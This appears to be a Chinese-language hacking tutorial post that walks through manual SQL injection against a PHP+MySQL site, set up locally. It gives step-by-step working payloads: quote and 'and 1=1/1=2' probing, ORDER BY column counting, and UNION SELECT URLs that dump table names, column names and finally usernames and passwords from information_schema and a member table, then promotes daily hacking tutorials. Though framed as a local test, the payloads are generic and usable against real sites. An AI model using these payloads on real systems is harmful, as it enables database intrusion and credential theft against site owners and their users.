https://www.ixigua.com/i6808913583561245192/

大家好，今天给大家写下如何渗透php+mysql网站，由于是测试我本地搭建了个网站

教程针对的是mysql5.0以上的版本！因为mysql5.0以上自带的有information_schema数据库，

information_schema：存储mysql下所有信息的数据库（数据库名，表名，列名）。

用的工具是apmserv

php函数:

database()：数据库名

user()：数据库用户

version()：数据库版本

Mysql数据库结构

数据库A

　　表名

　　　　列名

　　　　　　数据

数据库B

　　表名

　　　　列名

　　　　　　数据

一、判断是否存在注入点

先用 ' 单引号来测试

返回不正常，接着用and 来判断

and 1=1 返回正常

and 1=2

返回错误

简单两步确认存在sql注入漏洞

二、order by

18正确

19错误（说明存在18个字段）

三、UNION SELECT 联合查询

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

爆出的数字是2.3。我们把需要查询的函数写入2或者3上面来查询

查询数据库名 用户 数据库版本，操作系统

四、爆数据库下的所有表（数据库名需要转码）

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x6A69616E

五、爆数据库下表下的列

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x6262736D656D626572

六、爆列下的内容

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from bbsmember

账号密码都是admin

学习黑客技术的话 可以关注我，每天都会有相应的教程发布的！！！

感谢大家的支持

閱讀更多 黑客學習灬樑 的文章

關鍵字: 黑客 数据库 教程